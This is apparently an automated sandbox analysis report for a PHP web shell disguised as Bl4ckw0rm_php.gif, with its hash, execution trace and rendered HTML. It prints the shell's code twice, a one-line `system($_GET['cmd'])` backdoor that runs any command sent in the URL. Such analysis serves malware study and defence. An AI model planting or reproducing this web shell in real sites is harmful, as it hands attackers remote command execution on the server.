PHP Malware Analysis

Bl4ckw0rm_php.gif, shell.php

md5: 417825de2679b69343d730b18c1dcf3f

Attributes

Execution

Input

URLs
  • http://localhost/Bl4ckw0rm_php.gif (HTML)


Deobfuscated PHP code

<?php

echo "Shell";
system($_GET['cmd']);

Execution traces

data/traces/417825de2679b69343d730b18c1dcf3f_trace-1676250053.5823.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:01:19.480165]
1	0	1	0.000204	393512
1	3	0	0.000260	394008	{main}	1		/var/www/html/uploads/shell.php	0	0
2	4	0	0.000292	394008	system	0		/var/www/html/uploads/shell.php	1	1	NULL
2	4	1	0.000316	394040
2	4	R			FALSE
1	3	1	0.000330	394008
			0.000355	314224
TRACE END   [2023-02-12 23:01:19.480357]


Generated HTML code

<html style="height: 100%;"><head><meta name="viewport" content="width=device-width, minimum-scale=0.1"></head><body style="margin: 0px; background: #0e0e0e; height: 100%"><img style="display: block;-webkit-user-select: none;margin: auto;background-color: hsl(0, 0%, 90%);transition: background-color 300ms;" src="http://localhost/Bl4ckw0rm_php.gif"></body></html>

Original PHP code

<?php echo "Shell";system($_GET['cmd']); ?>